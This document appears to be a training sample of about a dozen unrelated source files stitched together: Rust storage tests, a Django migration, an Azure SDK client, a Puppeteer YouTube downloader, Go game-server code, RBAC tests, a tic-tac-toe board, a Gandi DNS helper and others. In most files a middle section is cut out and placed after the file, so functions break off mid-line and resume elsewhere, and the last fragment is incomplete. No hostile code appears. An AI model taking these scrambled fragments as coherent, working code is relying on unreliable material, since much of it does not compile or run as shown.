let content_list = flatten_list_stream(storage, None).await?;
assert_eq!(content_list, &[location.clone()]);
// List everything starting with a prefix that should return results
let mut prefix = storage.new_path();
prefix.push_dir("test_dir");
let content_list = flatten_list_stream(storage, Some(&prefix)).await?;
assert_eq!(content_list, &[location.clone()]);
// List everything starting with a prefix that shouldn't return results
let mut prefix = storage.new_path();
prefix.push_dir("something");
let content_list = flatten_list_stream(storage, Some(&prefix)).await?;
assert!(content_list.is_empty());
let read_data = storage.get(&location).await?.bytes().await?;
assert_eq!(&*read_data, expected_data);
storage.delete(&location).await?;
let content_list = flatten_list_stream(storage, None).await?;
assert!(content_list.is_empty());
Ok(())
}
pub(crate) async fn list_uses_directories_correctly(storage: &ObjectStore) -> Result<()> |
pub(crate) async fn list_with_delimiter(storage: &ObjectStore) -> Result<()> {
delete_fixtures(storage).await;
// ==================== check: store is empty ====================
let content_list = flatten_list_stream(storage, None).await?;
assert!(content_list.is_empty());
// ==================== do: create files ====================
let data = Bytes::from("arbitrary data");
let files: Vec<_> = [
"test_file",
"mydb/wb/000/000/000.segment",
"mydb/wb/000/000/001.segment",
"mydb/wb/000/000/002.segment",
"mydb/wb/001/001/000.segment",
"mydb/wb/foo.json",
"mydb/wbwbwb/111/222/333.segment",
"mydb/data/whatevs",
]
.iter()
.map(|&s| str_to_path(storage, s))
.collect();
for f in &files {
let data = data.clone();
storage.put(f, data).await.unwrap();
}
// ==================== check: prefix-list `mydb/wb` (directory) ====================
let mut prefix = storage.new_path();
prefix.push_all_dirs(&["mydb", "wb"]);
let mut expected_000 = prefix.clone();
expected_000.push_dir("000");
let mut expected_001 = prefix.clone();
expected_001.push_dir("001");
let mut expected_location = prefix.clone();
expected_location.set_file_name("foo.json");
let result = storage.list_with_delimiter(&prefix).await.unwrap();
assert_eq!(result.common_prefixes, vec![expected_000, expected_001]);
assert_eq!(result.objects.len(), 1);
let object = &result.objects[0];
assert_eq!(object.location, expected_location);
assert_eq!(object.size, data.len());
// ==================== check: prefix-list `mydb/wb/000/000/001` (partial filename doesn't match) ====================
let mut prefix = storage.new_path();
prefix.push_all_dirs(&["mydb", "wb", "000", "000"]);
prefix.set_file_name("001");
let mut expected_location = storage.new_path();
expected_location.push_all_dirs(&["mydb", "wb", "000", "000"]);
expected_location.set_file_name("001.segment");
let result = storage.list_with_delimiter(&prefix).await.unwrap();
assert!(result.common_prefixes.is_empty());
assert_eq!(result.objects.len(), 0);
// ==================== check: prefix-list `not_there` (non-existing prefix) ====================
let mut prefix = storage.new_path();
prefix.push_all_dirs(&["not_there"]);
let result = storage.list_with_delimiter(&prefix).await.unwrap();
assert!(result.common_prefixes.is_empty());
assert!(result.objects.is_empty());
// ==================== do: remove all files ====================
for f in &files {
storage.delete(f).await.unwrap();
}
// ==================== check: store is empty ====================
let content_list = flatten_list_stream(storage, None).await?;
assert!(content_list.is_empty());
Ok(())
}
#[allow(dead_code)]
pub(crate) async fn get_nonexistent_object(
storage: &ObjectStore,
location: Option<<ObjectStore as ObjectStoreApi>::Path>,
) -> Result<Vec<u8>> {
let location = location.unwrap_or_else(|| {
let mut loc = storage.new_path();
loc.set_file_name("this_file_should_not_exist");
loc
});
let content_list = flatten_list_stream(storage, Some(&location)).await?;
assert!(content_list.is_empty());
Ok(storage.get(&location).await?.bytes().await?)
}
/// Parse a str as a `CloudPath` into a `DirAndFileName`, even though the
/// associated storage might not be cloud storage, to reuse the cloud
/// path parsing logic. Then convert into the correct type of path for
/// the given storage.
fn str_to_path(storage: &ObjectStore, val: &str) -> path::Path {
let cloud_path = CloudPath::raw(val);
let parsed: DirsAndFileName = cloud_path.into();
let mut new_path = storage.new_path();
for part in parsed.directories {
new_path.push_dir(part.to_string());
}
if let Some(file_name) = parsed.file_name {
new_path.set_file_name(file_name.to_string());
}
new_path
}
async fn delete_fixtures(storage: &ObjectStore) {
let files: Vec<_> = [
"test_file",
"test_dir/test_file.json",
"mydb/wb/000/000/000.segment",
"mydb/wb/000/000/001.segment",
"mydb/wb/000/000/002.segment",
"mydb/wb/001/001/000.segment",
"mydb/wb/foo.json",
"mydb/data/whatevs",
"mydb/wbwbwb/111/222/333.segment",
"foo/x.json",
"foo.bar/y.json",
]
.iter()
.map(|&s| str_to_path(storage, s))
.collect();
for f in &files {
// don't care if it errors, should fail elsewhere
let _ = storage.delete(f).await;
}
}
// Tests TODO:
// GET nonexisting location (in_memory/file)
// DELETE nonexisting location
// PUT overwriting
}
| {
delete_fixtures(storage).await;
let content_list = flatten_list_stream(storage, None).await?;
assert!(
content_list.is_empty(),
"Expected list to be empty; found: {:?}",
content_list
);
let mut location1 = storage.new_path();
location1.push_dir("foo");
location1.set_file_name("x.json");
let mut location2 = storage.new_path();
location2.push_dir("foo.bar");
location2.set_file_name("y.json");
let data = Bytes::from("arbitrary data");
storage.put(&location1, data.clone()).await?;
storage.put(&location2, data).await?;
let mut prefix = storage.new_path();
prefix.push_dir("foo");
let content_list = flatten_list_stream(storage, Some(&prefix)).await?;
assert_eq!(content_list, &[location1.clone()]);
let mut prefix = storage.new_path();
prefix.push_dir("foo");
prefix.set_file_name("x");
let content_list = flatten_list_stream(storage, Some(&prefix)).await?;
assert_eq!(content_list, &[]);
Ok(())
} |
weakref_ref.py | #
"""Example using weakref.ref to manage a reference to an object.
"""
# end_pymotw_header
import weakref
class ExpensiveObject:
def __del__(self):
print("(Deleting {})".format(self))
obj = ExpensiveObject() |
print("obj:", obj)
print("ref:", r)
print("r():", r())
print("deleting obj")
del obj
print("r():", r()) | r = weakref.ref(obj) |
0024_auto_20200311_0154.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2020-03-11 01:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class | (migrations.Migration):
dependencies = [
('shop', '0023_auto_20200311_0137'),
]
operations = [
migrations.AlterField(
model_name='product',
name='type1',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='products_t', to='shop.Type1'),
),
]
| Migration |
usage_operations.py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from .. import models
class UsageOperations(object):
"""UsageOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client Api Version. Constant value: "2017-10-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-10-01"
self.config = config
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Gets the current usage count and the limit for the resources under the
subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Usage
:rtype:
~azure.mgmt.storage.v2017_10_01.models.UsagePaged[~azure.mgmt.storage.v2017_10_01.models.Usage]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def | (next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.UsagePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.UsagePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/usages'}
| internal_paging |
youTubeCdn.ts | import { launch } from 'puppeteer'
/**
* Gets the CDN URL of a YouTube
*
* @param youTubeLink The YouTube link
* @returns The CDN URL
*/
export default async (youTubeLink: string): Promise<string> => {
const browser = await launch({ headless: true, args: ['--no-sandbox'] });
const page = await browser.newPage();
await page.goto('https://yt1s.com/');
await page.type('#s_input', youTubeLink);
await page.keyboard.press('Enter');
await page.waitForSelector('#btn-action');
const chosenValue = await page.evaluate(() => {
const selector = <HTMLSelectElement> document.getElementById('formatSelect');
// skip 0th element
for(let i = 1; i < selector.options.length; i++) {
const option = selector.options[i];
const sizeString = selector[i].innerHTML.substring(
selector[i].innerHTML.indexOf('(') + 1,
selector[i].innerHTML.indexOf(')')
);
const sizeStrings = sizeString.split(' ');
if (sizeStrings[1] === "KB") {
return option.value;
} else if (parseFloat(sizeStrings[0]) <= 8.0) {
return option.value; | }
// Return the last value even though the size is too great
return selector.options[selector.options.length - 1].value;
});
await page.select('select#formatSelect', chosenValue);
await page.evaluate(() => {
const actionButton = <HTMLLinkElement> document.getElementById('btn-action');
actionButton.click();
});
await page.waitForSelector('#asuccess', { visible: true });
const href = await page.evaluate(() => {
const downloader = <HTMLLinkElement> document.getElementById('asuccess');
return downloader.href;
});
browser.close();
return href;
} | } |
svhn_provider.py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import List, Tuple, Union, Optional
from overrides import overrides, EnforceOverrides
from torch.utils.data.dataset import Dataset
import torchvision
from torchvision.transforms import transforms
from torch.utils.data import ConcatDataset
from archai.datasets.dataset_provider import DatasetProvider, register_dataset_provider, TrainTestDatasets
from archai.common.config import Config
from archai.common import utils
class SvhnProvider(DatasetProvider):
|
register_dataset_provider('svhn', SvhnProvider) | def __init__(self, conf_dataset:Config):
super().__init__(conf_dataset)
self._dataroot = utils.full_path(conf_dataset['dataroot'])
@overrides
def get_datasets(self, load_train:bool, load_test:bool,
transform_train, transform_test)->TrainTestDatasets:
trainset, testset = None, None
if load_train:
trainset = torchvision.datasets.SVHN(root=self._dataroot, split='train',
download=True, transform=transform_train)
extraset = torchvision.datasets.SVHN(root=self._dataroot, split='extra',
download=True, transform=transform_train)
trainset = ConcatDataset([trainset, extraset])
if load_test:
testset = torchvision.datasets.SVHN(root=self._dataroot, split='test',
download=True, transform=transform_test)
return trainset, testset
@overrides
def get_transforms(self)->tuple:
MEAN = [0.4914, 0.4822, 0.4465]
STD = [0.2023, 0.1994, 0.20100]
transf = [
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip()
]
normalize = [
transforms.ToTensor(),
transforms.Normalize(MEAN, STD)
]
train_transform = transforms.Compose(transf + normalize)
test_transform = transforms.Compose(normalize)
return train_transform, test_transform |
cross.go | package logic
import (
"context"
"errors"
centertypes "fgame/fgame/center/types"
"fgame/fgame/common/lang"
"fgame/fgame/common/message"
"fgame/fgame/core/session"
grpcsession "fgame/fgame/core/session/grpc"
grpcpb "fgame/fgame/core/session/grpc/pb"
"fgame/fgame/game/center/center"
gamecodec "fgame/fgame/game/codec"
"fgame/fgame/game/cross/cross"
crosseventtypes "fgame/fgame/game/cross/event/types"
"fgame/fgame/game/cross/pbutil"
playercross "fgame/fgame/game/cross/player"
crosssession "fgame/fgame/game/cross/session"
crosstypes "fgame/fgame/game/cross/types"
gameevent "fgame/fgame/game/event"
"fgame/fgame/game/global"
loginlogic "fgame/fgame/game/login/logic"
"fgame/fgame/game/player"
playerlogic "fgame/fgame/game/player/logic"
playertypes "fgame/fgame/game/player/types"
"fgame/fgame/game/processor"
scenelogic "fgame/fgame/game/scene/logic"
"fgame/fgame/game/scene/scene"
gamesession "fgame/fgame/game/session"
"fmt"
log "github.com/Sirupsen/logrus"
)
//用户进入跨服
func PlayerEnterCross(pl player.Player, crossType crosstypes.CrossType, args ...string) {
PlayerEnterCrossWithBehavior(pl, crossType, crosstypes.CrossBehaviorTypeNormal, args...)
return
}
func PlayerEnterCrossWithBehavior(pl player.Player, crossType crosstypes.CrossType, behaviorType crosstypes.CrossBehaviorType, args ...string) {
crossManager := pl.GetPlayerDataManager(playertypes.PlayerCrossDataManagerType).(*playercross.PlayerCrossDataManager)
tempArgs := make([]string, 0, len(args)+1)
tempArgs = append(tempArgs, fmt.Sprintf("%d", behaviorType))
tempArgs = append(tempArgs, args...)
crossManager.EnterCross(crossType, tempArgs...)
//异步连接跨服
connectCross(pl, crossType.GetServerType())
return
}
func PlayerTracEnterCross(pl player.Player, crossType crosstypes.CrossType, behaviorType crosstypes.CrossBehaviorType, foeId string) (flag bool) {
if !CheckBeforeEnterCross(pl, crossType) {
return
}
PlayerEnterCrossWithBehavior(pl, crossType, behaviorType, foeId)
return
}
func CheckBeforeEnterCross(pl player.Player, crossType crosstypes.CrossType) bool {
if !cross.CheckEnterCross(pl, crossType) {
return false
}
return true
}
func PlayerReenterCross(pl player.Player, crossType crosstypes.CrossType) {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:用户重新进入跨服")
//跨服不重连
switch crossType {
case crosstypes.CrossTypeLianYu,
crosstypes.CrossTypeGodSiegeQiLin,
crosstypes.CrossTypeGodSiegeHuoFeng,
crosstypes.CrossTypeGodSiegeDuLong,
crosstypes.CrossTypeDenseWat,
crosstypes.CrossTypeShenMoWar:
PlayerExitCross(pl)
return
}
//异步连接跨服
connectCross(pl, crossType.GetServerType())
return
}
//用户退出跨服和返回上一个场景
func PlayerExitCross(pl player.Player) {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:跨服数据退出")
crossManager := pl.GetPlayerDataManager(playertypes.PlayerCrossDataManagerType).(*playercross.PlayerCrossDataManager)
crossManager.ExitCross()
crossSession := pl.GetCrossSession()
if crossSession != nil {
crossSession.Close(true)
}
}
//用户退出跨服和返回上一个场景
func AsyncPlayerExitCross(pl player.Player) {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("arena:跨服数据异步退出")
ctx := scene.WithPlayer(context.Background(), pl)
pl.Post(message.NewScheduleMessage(onAsyncPlayerExitCross, ctx, nil, nil))
}
func onAsyncPlayerExitCross(ctx context.Context, result interface{}, err error) error {
pl := scene.PlayerInContext(ctx)
p := pl.(player.Player)
PlayerExitCross(p)
return nil
}
var (
errorCrossConnNoFound = errors.New("跨服连接不存在")
errorCrossNoSupport = errors.New("跨服不支持")
)
//连接跨服
func connectCross(pl player.Player, serverType centertypes.GameServerType) {
crossDisable := global.GetGame().CrossDisable()
if crossDisable {
err := errorCrossNoSupport
ctx := scene.WithPlayer(context.Background(), pl)
//回调连接失败
sm := message.NewScheduleMessage(onPlayerCrossConnect, ctx, nil, err)
pl.Post(sm)
return
}
go func() {
var err error
defer func() {
//TODO 捕捉panic
if err != nil {
ctx := scene.WithPlayer(context.Background(), pl)
//回调连接失败
sm := message.NewScheduleMessage(onPlayerCrossConnect, ctx, nil, err)
//跨服携程处理
// cross.GetCrossService().GetCross().Post(sm)
pl.Post(sm)
}
}()
//获取grpc连接
conn := center.GetCenterService().GetCross(serverType)
if conn == nil {
err = errorCrossConnNoFound
return
}
openHandler := session.SessionHandlerFunc(onSessionOpen)
closeHandler := session.SessionHandlerFunc(onSessionClose)
receiveHandler := session.HandlerFunc(onSessionReceive)
sendHandler := session.HandlerFunc(onSessionSend)
h := grpcsession.NewGrpcClientHandler(openHandler, closeHandler, receiveHandler, sendHandler)
cc := grpcpb.NewConnectionClient(conn)
//TODO 制作超时和元信息
ctx := pl.GetContext()
ccc, err := cc.Connect(ctx)
if err != nil {
//TODO 连接失败
return
}
h.Handle(ccc)
}()
}
//跨服成功回调
func onPlayerCrossConnect(ctx context.Context, result interface{}, err error) (rerr error) {
pl := scene.PlayerInContext(ctx)
p := pl.(player.Player)
if err != nil {
onPlayerCrossConnectFailed(p, err)
return nil
}
sess := result.(session.Session)
onPlayerCrossConnectSuccess(p, sess)
return
}
//跨服连接失败
func onPlayerCrossConnectFailed(pl pla | ).Warn("cross:玩家跨服,失败")
}
//TODO 重试
playerlogic.SendSystemMessage(pl, lang.CrossFailed)
//退出
crossManager := pl.GetPlayerDataManager(playertypes.PlayerCrossDataManagerType).(*playercross.PlayerCrossDataManager)
crossManager.ExitCross()
return
}
//跨服连接成功
func onPlayerCrossConnectSuccess(pl player.Player, sess session.Session) {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:玩家跨服,连接成功")
//创建跨服对话和上下文
ps := crosssession.NewSendSession(sess, gamecodec.GetCodec(), nil)
nctx := crosssession.WithSendSession(pl.GetContext(), ps)
sess.SetContext(nctx)
//TODO 跨服管理器添加用户
//设置跨服session
pl.SetCrossSession(ps)
//TODO 发送连接成功事件
//发送登陆消息
siLogin := pbutil.BuildSILogin(pl.GetId())
pl.SendCrossMsg(siLogin)
}
//跨服连接关闭
// func onPlayerCrossConnectClose(ctx context.Context, result interface{}, err error) (rerr error) {
// pl := scene.PlayerInContext(ctx)
// p := pl.(player.Player)
// log.WithFields(
// log.Fields{
// "playerId": pl.GetId(),
// }).Info("cross:跨服连接关闭")
// //TODO 被动断开 重连
// //退出跨服
// onPlayerExitCross(p)
// return
// }
var (
crossFailed = errors.New("cross failed")
)
//对话打开
func onSessionOpen(sess session.Session) (err error) {
//设置到玩家身上
gameS := gamesession.SessionInContext(sess.Context())
pl := gameS.Player().(player.Player)
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:跨服,对话打开")
ctx := scene.WithPlayer(context.Background(), pl)
sm := message.NewScheduleMessage(onPlayerCrossConnect, ctx, sess, nil)
pl.Post(sm)
return nil
}
//对话关闭
func onSessionClose(sess session.Session) (err error) {
gameS := gamesession.SessionInContext(sess.Context())
pl := gameS.Player().(player.Player)
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:跨服,对话关闭")
pl.LogoutCross()
// ctx := scene.WithPlayer(context.Background(), pl)
// sm := message.NewScheduleMessage(onPlayerCrossConnectClose, ctx, nil, nil)
// pl.Post(sm)
// cross.GetCrossService().GetCross().Post(sm)
return nil
}
//接受消息
func onSessionReceive(sess session.Session, msg []byte) (err error) {
return processor.GetMessageProcessor().ProcessCross(sess, msg)
}
//发送消息
func onSessionSend(sess session.Session, msg []byte) (err error) {
return nil
}
//跨服关闭
func OnPlayerExitCross(pl player.Player, crossType crosstypes.CrossType) {
//退出匹配状态
gameevent.Emit(crosseventtypes.EventTypePlayerCrossExit, pl, crossType)
//移除跨服
cross.GetCrossService().GetCross().RemovePlayer(pl)
if pl.IsCross() {
//防止退出奔溃
defer func() {
//捕捉奔溃
if r := recover(); r != nil {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
"error": r,
}).Error("cross:退出跨服,异常")
//登出中
if pl.IsLogouting() {
loginlogic.Logout(pl)
} else {
pl.Close(nil)
}
return
}
//登出
if pl.IsLogouting() {
loginlogic.Logout(pl)
}
}()
flag := pl.LeaveCross()
if !flag {
panic(fmt.Errorf("cross:退出跨服应该成功"))
}
if !pl.IsLogouting() {
scenelogic.PlayerEnterOriginScene(pl)
}
} else {
//登出
if pl.IsLogouting() {
//退出场景
loginlogic.Logout(pl)
return
}
}
return
}
//玩家数据推送
func CrossPlayerDataLogin(pl player.Player) {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Info("cross:跨服,跨服数据推送")
//退出场景
if pl.GetScene() != nil {
//退出场景 失败
scenelogic.PlayerExitScene(pl, true)
}
flag := pl.EnterCross()
if !flag {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Warn("cross:跨服,进入跨服失败")
se := pl.GetCrossSession()
if se != nil {
se.Close(true)
}
return
}
ctx := scene.WithPlayer(context.Background(), pl)
sm := message.NewScheduleMessage(onPlayerEnterCross, ctx, nil, nil)
cross.GetCrossService().GetCross().Post(sm)
}
func onPlayerEnterCross(ctx context.Context, result interface{}, err error) (rerr error) {
p := scene.PlayerInContext(ctx)
pl := p.(player.Player)
cross.GetCrossService().GetCross().AddPlayer(pl)
flag := pl.Cross()
if !flag {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
}).Warn("cross:跨服,进入跨服登陆失败")
//TODO 发送异常代码
pl.GetCrossSession().Close(true)
return
}
gameevent.Emit(crosseventtypes.EventTypePlayerCrossEnter, pl, nil)
//推送用户数据
siPlayerData := pbutil.BuildSIPlayerData(pl)
//推送用户数据
pl.SendCrossMsg(siPlayerData)
return
}
| yer.Player, err error) {
crossType := pl.GetCrossType()
//不管奔溃都要移除
defer OnPlayerExitCross(pl, crossType)
if err != nil {
log.WithFields(
log.Fields{
"playerId": pl.GetId(),
"err": err,
} |
common_test.go | package rbac
import (
"fmt"
"reflect"
"testing"
"github.com/rancher/norman/types"
v3 "github.com/rancher/rancher/pkg/generated/norman/management.cattle.io/v3"
rbacv1 "k8s.io/api/rbac/v1"
)
func Test_BuildSubjectFromRTB(t *testing.T) {
type testCase struct {
from interface{}
to rbacv1.Subject
iserr bool
}
userSubject := rbacv1.Subject{
Kind: "User",
Name: "tmp-user",
}
groupSubject := rbacv1.Subject{
Kind: "Group",
Name: "tmp-group",
}
saSubject := rbacv1.Subject{
Kind: "ServiceAccount",
Name: "tmp-sa",
Namespace: "tmp-namespace",
}
testCases := []testCase{
testCase{
from: nil,
iserr: true,
},
testCase{
from: &v3.ProjectRoleTemplateBinding{
UserName: userSubject.Name,
},
to: userSubject,
},
testCase{
from: &v3.ProjectRoleTemplateBinding{
GroupName: groupSubject.Name,
},
to: groupSubject,
},
testCase{
from: &v3.ProjectRoleTemplateBinding{
ServiceAccount: fmt.Sprintf("%s:%s", saSubject.Namespace, saSubject.Name),
},
to: saSubject,
},
testCase{
from: &v3.ClusterRoleTemplateBinding{
UserName: userSubject.Name,
},
to: userSubject,
},
testCase{
from: &v3.ClusterRoleTemplateBinding{
GroupName: groupSubject.Name,
},
to: groupSubject,
},
testCase{
from: &v3.ProjectRoleTemplateBinding{
ServiceAccount: "wrong-format",
},
iserr: true,
},
}
for _, tcase := range testCases {
output, err := BuildSubjectFromRTB(tcase.from)
if tcase.iserr && err == nil {
t.Errorf("roletemplatebinding %v should return error", tcase.from)
} else if !tcase.iserr && !reflect.DeepEqual(tcase.to, output) {
t.Errorf("the subject %v from roletemplatebinding %v is mismatched, expect %v", output, tcase.from, tcase.to)
}
}
}
func Test_TypeFromContext(t *testing.T) | {
type testCase struct {
apiContext *types.APIContext
resource *types.RawResource
expectedType string
}
testCases := []testCase{
{
apiContext: &types.APIContext{
Type: "catalog",
},
resource: nil,
expectedType: "catalog",
},
{
apiContext: &types.APIContext{
Type: "subscribe",
},
resource: &types.RawResource{
Type: "catalog",
},
expectedType: "catalog",
},
}
for _, tcase := range testCases {
outputType := TypeFromContext(tcase.apiContext, tcase.resource)
if tcase.expectedType != outputType {
t.Errorf("resource type %s is mismatched, expect %s", outputType, tcase.expectedType)
}
}
} |
|
sub_board.rs | use super::enums::{BoardState, GameState};
use super::types::Coord;
const SIZE: usize = 3;
const MOVE_LIMIT: usize = SIZE.pow(2);
#[derive(Clone, Debug, PartialEq, Eq, Copy)]
pub struct SubBoard<T> {
board: [[T; 3]; 3],
winner: Option<BoardState>,
move_count: usize,
}
impl<T> SubBoard<T>
where
T: GameState,
{
pub fn new() -> Self {
Self {
board: [[T::default(); 3]; 3],
winner: None,
move_count: 0,
}
}
pub fn make_move(&mut self, player: T, location: Coord) {
if self.is_finished() {
panic!("Attempted to make move on finished board");
}
self.board[location.x][location.y] = player;
self.move_count += 1;
// Check if the board has been won
self.check_row(location.x);
if !self.is_finished() {
self.check_column(location.y);
}
if !self.is_finished() {
self.check_ltr_diagonal();
}
if !self.is_finished() {
self.check_rtl_diagonal();
}
// check for a tie
if !self.is_finished() && self.move_count == MOVE_LIMIT {
self.winner = Some(BoardState::Tie);
}
}
pub fn is_finished(&self) -> bool |
pub fn hash(&self) -> usize {
let mut hash = 0;
for square in self.board.iter().flatten() {
hash += square.hash_value();
hash = hash << 2;
}
hash
}
pub fn undo_move(&mut self, location: Coord) {
self.board[location.x][location.y] = T::default();
self.move_count -= 1;
self.winner = None;
}
pub fn get_valid_moves(&self) -> Vec<Coord> {
self.board
.iter()
.flatten()
.enumerate()
.filter(|(_, v)| **v == T::default())
.map(|(i, _)| Coord::new(i / 3, i % 3))
.collect()
}
pub fn is_winner(&self) -> Option<BoardState> {
self.winner
}
fn check_row(&mut self, row: usize) {
let player = self.board[row][0];
if !player.allow_win() {
return;
}
for i in 1..SIZE {
if player != self.board[row][i] {
return;
}
}
self.winner = Some(player.to_board_state())
}
/**
* Check if a given column has been won
* @param col Column index
*/
fn check_column(&mut self, col: usize) {
let player = self.board[0][col];
if !player.allow_win() {
return;
}
for i in 1..SIZE {
if player != self.board[i][col] {
return;
}
}
self.winner = Some(player.to_board_state())
}
fn check_ltr_diagonal(&mut self) {
let player = self.board[0][0];
if !player.allow_win() {
return;
}
for i in 1..SIZE {
if player != self.board[i][i] {
return;
}
}
self.winner = Some(player.to_board_state())
}
/**
* Check if the right to left diagonal has been won
*/
fn check_rtl_diagonal(&mut self) {
let player = self.board[SIZE - 1][0];
if !player.allow_win() {
return;
}
for i in 1..SIZE {
if player != self.board[SIZE - 1 - i][i] {
return;
}
}
self.winner = Some(player.to_board_state())
}
}
| {
self.winner.is_some()
} |
gandi_api.py | import requests
import urllib
from collections import namedtuple
from certbot.plugins import dns_common
try:
from urllib import quote # Python 2.X
except ImportError:
from urllib.parse import quote # Python 3+
_GandiConfig = namedtuple('_GandiConfig', ('api_key',))
_BaseDomain = namedtuple('_BaseDomain', ('zone_uuid', 'fqdn'))
def get_config(api_key):
return _GandiConfig(api_key=api_key)
def _get_json(response):
try:
data = response.json()
except ValueError:
return dict()
return data
def _get_response_message(response, default='<No reason given>'):
return _get_json(response).get('message', default)
def _headers(cfg):
return {
'Content-Type': 'application/json',
'X-Api-Key': cfg.api_key
}
def _get_url(*segs):
return 'https://dns.api.gandi.net/api/v5/{}'.format(
'/'.join(quote(seg, safe='') for seg in segs)
)
def _request(cfg, method, segs, **kw):
headers = _headers(cfg)
url = _get_url(*segs)
return requests.request(method, url, headers=headers, **kw)
def _get_base_domain(cfg, domain):
for candidate_base_domain in dns_common.base_domain_name_guesses(domain):
response = _request(cfg, 'GET', ('domains', candidate_base_domain))
if response.ok:
data = _get_json(response)
zone_uuid = data.get('zone_uuid')
fqdn = data.get('fqdn')
if zone_uuid and fqdn:
return _BaseDomain(zone_uuid=zone_uuid, fqdn=fqdn)
return None
def _get_relative_name(base_domain, name):
suffix = '.' + base_domain.fqdn
return name[:-len(suffix)] if name.endswith(suffix) else None
def _del_txt_record(cfg, base_domain, relative_name):
return _request(
cfg,
'DELETE',
('zones', base_domain.zone_uuid, 'records', relative_name, 'TXT'))
def _update_record(cfg, domain, name, request_runner):
base_domain = _get_base_domain(cfg, domain)
if base_domain is None:
return 'Unable to get base domain for "{}"'.format(domain)
relative_name = _get_relative_name(base_domain, name)
if relative_name is None:
return 'Unable to derive relative name for "{}"'.format(name)
response = request_runner(base_domain, relative_name)
return None if response.ok else _get_response_message(response)
def get_txt_records(cfg, domain, name):
base_domain = _get_base_domain(cfg, domain)
if base_domain is None:
return 'Unable to get base domain for "{}"'.format(domain)
relative_name = _get_relative_name(base_domain, name)
if relative_name is None:
return 'Unable to derive relative name for "{}"'.format(name)
response = _request(
cfg,
'GET',
('zones', base_domain.zone_uuid, 'records', relative_name, 'TXT'))
if response.ok:
return response.json().get('rrset_values')
else: |
def add_txt_record(cfg, domain, name, value):
def requester(base_domain, relative_name):
_del_txt_record(cfg, base_domain, relative_name)
return _request(
cfg,
'POST',
('zones', base_domain.zone_uuid, 'records', relative_name, 'TXT'),
json={
'rrset_values': value if isinstance(value, list) else [value]
})
return _update_record(cfg, domain, name, requester)
def del_txt_record(cfg, domain, name):
def requester(base_domain, relative_name):
return _del_txt_record(cfg, base_domain, relative_name)
return _update_record(cfg, domain, name, requester) | return [] |
ServiceProvider.ts | import IServiceProvider from "../../Core/Interface/IServiceProvider";
import ServiceContainer from "../../Core/ServiceContainer";
import BaseServiceProvider from "../../Core/ServiceProvider";
import Client from "./ServiceClient";
import AccessToken from "../Auth/AccessToken";
/**
* Semantic Service Provider
*/
export default class | extends BaseServiceProvider implements IServiceProvider {
public register(app: ServiceContainer) {
super._register(app);
app.setService("semantic", new Client(app, new AccessToken(app)));
return this;
}
}
| ServiceProvider |
fasterfrequentwords.py | seq = 'CTTCTCACGTACAACAAAATC'
symbol2number = {"A":0,"C":1,"G":2,"T":3}
def PatternToNumber(Pattern):
if not Pattern:
return 0
symbol = Pattern[-1]
prefix = Pattern[:-1]
return ((4*PatternToNumber(prefix))+symbol2number[symbol])
def | (index, k):
bases = ['A', 'C', 'G', 'T']
pattern = ''
for i in range(k):
pattern += bases[index % 4]
index = index // 4
return pattern[::-1]
def ComputingFrequencies(text,k):
FrequencyArray =[]
for i in range(0,((4**k))):
FrequencyArray.append(0)
for i in range(0,(len(text)-1)):
pattern = text[i:(i+k)]
j = PatternToNumber(pattern)
FrequencyArray[j] = FrequencyArray[j]+1
return FrequencyArray
def FasterFrequentWords(text,k):
FrequentPatterns = []
FrequencyArray = ComputingFrequencies(text,k)
maxCount = max(FrequencyArray)
